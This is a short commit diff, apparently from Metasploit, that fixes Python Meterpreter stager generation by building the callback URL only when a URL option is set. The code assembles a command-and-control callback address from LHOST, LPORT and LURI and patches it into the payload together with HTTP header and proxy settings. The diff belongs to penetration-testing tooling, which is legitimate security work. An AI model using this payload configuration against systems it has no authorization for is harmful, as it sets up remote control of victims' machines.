uri is not always defined, fix python stager generation

busterb · busterb · commit 37ab771ca9d2 · 2017-11-21T13:47:19.000-06:00
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb
@@ -105,28 +105,30 @@ def stage_meterpreter(opts={})
     # The callback URL can be different to the one that we're receiving from the interface
     # so we need to generate it
     # TODO: move this to somewhere more common so that it can be used across payload types
-    uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}"
-    callback_url = [
-      opts[:url].split(':')[0],
-      '://',
-      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
-      ':',
-      (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
-      ds['LURI'].to_s,
-      uri,
-      '/'
-    ].join('')
-
-    # patch in the various payload related configuration
-    met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
-    met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
-    met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
-    met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
-    met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
-
-    if http_proxy_host.to_s != ''
-      proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
-      met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+    unless opts[:url].to_s == ''
+      uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}"
+      callback_url = [
+        opts[:url].to_s.split(':')[0],
+        '://',
+        (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s,
+        ':',
+        (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s,
+        ds['LURI'].to_s,
+        uri,
+        '/'
+      ].join('')
+
+      # patch in the various payload related configuration
+      met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'")
+      met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != ''
+      met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != ''
+      met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != ''
+      met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != ''
+
+      if http_proxy_host.to_s != ''
+        proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}"
+        met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'")
+      end
     end
 
     # patch in any optional stageless tcp socket setup
